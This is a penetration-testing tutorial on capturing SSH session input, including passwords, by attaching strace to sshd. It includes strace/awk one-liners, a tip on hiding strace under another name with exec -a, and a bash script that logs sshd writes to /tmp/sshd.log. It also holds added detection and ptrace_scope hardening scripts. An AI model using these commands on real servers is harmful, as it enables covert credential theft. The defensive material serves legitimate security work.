Using strace to monitor SSH connections on Linux
As a penetration tester, I like to avoid replacing binaries on running systems as it makes it more difficult to clean up the system after we're done. Occasionally a tester will come across a Linux server that is used to connect to other internal systems. It would be nice to be able to monitor the SSH sessions without replacing the SSHD daemon. This is where ptrace comes in handy.
Using strace to hook into SSH
The system call ptrace is used to monitor and control another process. It's mostly used by debuggers and programs that map out what another application is doing. One of these applications is strace. Strace connects to another process and prints out all the system calls that the attached process is using. This includes the data that is being sent from a user through SSH.
The SSH client and SSH server use different system calls to read data from the user and show data on the screen. For example, you can read what the user is typing into an SSH client by connecting strace to the process and looking for read(#, "[data]", 16384) system calls. If you attach to an SSH server then you can read what the user is sending by looking for the write(#, "[data]", 1) system calls. The # symbol represents the file descriptor number that SSH is using. This can change based on a number of factors, but should be the same for each SSH process on a system.
# ps -fC sshd
UID        PID  PPID  C STIME TTY          TIME CMD
root      2734     1  0 10:27 ?        00:00:00 /usr/sbin/sshd
root     13909  2734  0 14:05 ?        00:00:00 sshd: root@pts/0
root     13919  2734  0 14:05 ?        00:00:00 sshd: root@pts/1
# strace -p 13909 -e write 2>&1 | egrep "^write\(.*1\)"
write(7, "p", 1) = 1
write(7, "a", 1) = 1
write(7, "s", 1) = 1
write(7, "s", 1) = 1
write(7, "w", 1) = 1
write(7, "o", 1) = 1
write(7, "r", 1) = 1
write(7, "d", 1) = 1
write(7, "\r", 1) = 1
We can use awk to make the output a little prettier:
# strace -p 13909 2>&1 | awk '/^write\(.*1\)/ {gsub(/\"/, "");gsub(/\,/, "");gsub(/\\r/, "\\n");sub(/[0-9]*\)/," ",$2);sub(/\\177/,"\b",$2);sub(/\\t/,"\t",$2);sub(/\\3/,"\^C",$2);printf $2}'
password\n
strace -ff -e write -p sshd_PID -o /tmp/sshd.log # record sshd log (for example, password)
Automated strace SSH key logger Python proof of concept
It is possible to automate hooking into new SSH connections using strace and writing the results to a file. The Python code available here can do that. Because of how the Python code parses the data, it only updates the log files after a certain number of bytes have been read. While this method isn't very stealthy, it is possible to use exec -a [name] to have strace appear under a different command name in ps and top.
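A detection counterpart to the technique above, written as an added example for this page (it is not code from the original article or from NetSPI): every process being traced has a non-zero TracerPid field in /proc/PID/status, so a defender can list sshd processes that currently have a tracer attached and identify the tracer by its real executable via /proc/PID/exe, which is what the kernel actually executed regardless of the name that exec -a put into argv[0]. It assumes a Linux /proc layout and that it is run as root (reading another user's /proc/PID/exe otherwise fails and is reported as "unknown"). A legitimately attached debugger is reported the same way, so a hit is a prompt to investigate rather than proof of compromise.

```shell
#!/bin/sh
# Added example, not part of the original article: report sshd processes that
# have a ptrace tracer attached, and name the tracer by its real binary.

# tracer_pid_from_status FILE
# Print the TracerPid field of a /proc/<pid>/status style file (0 = not traced).
tracer_pid_from_status() {
    awk '/^TracerPid:/ { print $2; exit }' "$1"
}

# name_from_status FILE
# Print the Name field (the comm name) of a /proc/<pid>/status style file.
name_from_status() {
    awk '/^Name:/ { print $2; exit }' "$1"
}

# real_exe PID
# Resolve /proc/PID/exe: the binary actually running, whatever argv[0] claims.
# Needs root (or the same uid) to read; prints "unknown" otherwise.
real_exe() {
    readlink "/proc/$1/exe" 2>/dev/null || echo "unknown"
}

# traced_sshd_report
# Walk /proc and print one line per sshd process whose TracerPid is non-zero:
#   <sshd pid> traced-by <tracer pid> <tracer comm name> <tracer real exe>
# Returns 0 when at least one traced sshd was found, 1 otherwise.
traced_sshd_report() {
    found=1
    for status in /proc/[0-9]*/status; do
        [ -r "$status" ] || continue
        [ "$(name_from_status "$status")" = "sshd" ] || continue
        tracer=$(tracer_pid_from_status "$status")
        [ -n "$tracer" ] && [ "$tracer" != "0" ] || continue
        pid=${status#/proc/}
        pid=${pid%/status}
        printf '%s traced-by %s %s %s\n' "$pid" "$tracer" \
            "$(name_from_status "/proc/$tracer/status" 2>/dev/null)" \
            "$(real_exe "$tracer")"
        found=0
    done
    return $found
}

# Run the scan when executed directly; a clean host prints the final message.
traced_sshd_report || echo "no traced sshd processes found"
```

On a host where the strace session from the article is running, the report line would show the strace binary as the tracer's real executable even if it was started with exec -a under another name; running the scan from cron or a host-based agent and alerting on any output is the simplest way to turn it into a detection.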
Mitigate ptrace attacks by disabling ptrace
Linux kernel version 3.4 and above support the ability to limit or disable ptrace altogether. This can be done by using sysctl to set kernel.yama.ptrace_scope to 1, 2, or 3. By default most distributions set this to 1. According to the Linux kernel Yama documentation, these numbers map to the following permissions:
0 - Allow non-child processes to ptrace a process
1 - Block non-child processes from ptrace-ing a process
2 - Only processes with CAP_SYS_PTRACE may use it or children calling PTRACE_TRACEME
3 - Disable ptrace. Requires a reboot to change
This makes it possible to disable ptrace on a system by running "sysctl kernel.yama.ptrace_scope=3". However, this may break other programs that are running. Wine, for example, does not work properly with ptrace disabled. I suggest that you test a non-production server and verify that all of its functions can run properly without ptrace enabled. Disabling ptrace also prevents some debugging features.
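The audit and hardening steps described above, as an added example for this page (not code from the original article): it reads the running kernel.yama.ptrace_scope value, explains what it permits, compares it against a required minimum, and can apply a new value both immediately with sysctl and persistently through a drop-in file. It assumes a Linux kernel with the Yama LSM available and uses /etc/sysctl.d/10-ptrace.conf as an assumed, conventional drop-in path. One point the example makes explicit: in the scenario on this page strace runs as root, and root holds CAP_SYS_PTRACE, so values 1 and 2 only restrict unprivileged users; value 3 is the only setting that stops a root-level tracer, and it cannot be lowered again without a reboot.

```shell
#!/bin/sh
# Added example, not part of the original article: audit and persistently set
# kernel.yama.ptrace_scope. Assumes Linux with the Yama LSM built in.

PTRACE_SCOPE_FILE=/proc/sys/kernel/yama/ptrace_scope
SYSCTL_DROPIN=/etc/sysctl.d/10-ptrace.conf   # assumed drop-in location

# ptrace_scope_meaning VALUE
# Describe a ptrace_scope value, following the kernel's Yama documentation.
ptrace_scope_meaning() {
    case "$1" in
        0) echo "0: any process may attach to another process of the same uid" ;;
        1) echo "1: only a descendant (or a process named via PR_SET_PTRACER) may attach" ;;
        2) echo "2: attach requires CAP_SYS_PTRACE; children may still use PTRACE_TRACEME" ;;
        3) echo "3: ptrace attach disabled entirely; cannot be lowered without a reboot" ;;
        *) echo "unknown ptrace_scope value: $1"; return 1 ;;
    esac
}

# ptrace_scope_current
# Print the running value, or "unavailable" when Yama is not present.
ptrace_scope_current() {
    if [ -r "$PTRACE_SCOPE_FILE" ]; then cat "$PTRACE_SCOPE_FILE"; else echo unavailable; fi
}

# ptrace_scope_verdict CURRENT REQUIRED
# Print "ok" and return 0 when CURRENT is a valid value >= REQUIRED, else print
# "weak" and return 1. A root attacker (CAP_SYS_PTRACE) is only blocked by 3,
# so REQUIRED=3 is the bar for the sshd-snooping case; 1 and 2 stop
# unprivileged users only.
ptrace_scope_verdict() {
    case "$1" in
        [0-3]) ;;
        *) echo weak; return 1 ;;
    esac
    if [ "$1" -ge "$2" ]; then echo ok; return 0; else echo weak; return 1; fi
}

# ptrace_scope_harden VALUE
# Apply VALUE now and persist it across reboots. Refuses to lower the scope
# from 3, because the kernel will not permit that without a reboot anyway.
ptrace_scope_harden() {
    current=$(ptrace_scope_current)
    if [ "$current" = unavailable ]; then
        echo "Yama is not available on this kernel" >&2; return 2
    fi
    if [ "$current" = 3 ] && [ "$1" != 3 ]; then
        echo "ptrace_scope is 3; lowering it requires a reboot" >&2; return 1
    fi
    printf 'kernel.yama.ptrace_scope = %s\n' "$1" > "$SYSCTL_DROPIN" && \
        sysctl -w "kernel.yama.ptrace_scope=$1"
}

# Usage: no arguments audits the current setting; one argument (e.g. 3) hardens.
if [ $# -eq 0 ]; then
    cur=$(ptrace_scope_current)
    echo "kernel.yama.ptrace_scope = $cur"
    [ "$cur" = unavailable ] || ptrace_scope_meaning "$cur"
else
    ptrace_scope_harden "$1"
fi
```

Run it without arguments on a candidate host first; as the article advises, verify on a non-production system that nothing relies on ptrace (Wine, debuggers, some profilers) before passing 3, since that choice is permanent until the next reboot.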
#!/bin/bash
# Author: nixawk paul

# Get sshd Process ID
SSHD_pid=`ps -fC sshd | grep "sshd" | grep -v "grep" | awk -F " " '{print $2}'`
if [[ -z "$SSHD_pid" ]]; then
    echo "[-] SSH Server does not start."
    exit 1
fi

# Check permission
if [[ "$UID" -ne 0 ]]; then
    echo "[-] Must be root to execute the script."
    exit 1
fi

# Trace sshd operations
# log ssh passwords
SSHD_log="/tmp/sshd.log"
if [[ -n "$SSHD_log" ]]; then
    echo "[+] create log file: $SSHD_log"
    : > $SSHD_log
    if [[ -w $SSHD_log ]]; then
        strace -ff -e write -p $SSHD_pid 2>&1 | tee -a "$SSHD_log"
    fi
fi

# Disable ptrace
# sysctl kernel.yama.ptrace_scope = 0 / 1 / 2 / 3
# 0 ---- Allow non-child processes to ptrace a process
# 1 ---- Block non-child processes from ptrace-ing a process
# 2 ---- Only processes with CAP_SYS_PTRACE may use it or children calling PTRACE_TRACEME
# 3 ---- Disable ptrace. Requires a reboot to change
Conclusion
While ptrace provides useful debugging functionality, in the wrong scenario it can cause security issues. This is why it is important to take a look at what is needed for a server to perform its function and disable any unneeded functionality and services.
Source: https://www.netspi.com/DesktopModules/SunBlog/Handlers/Print.aspx?id=224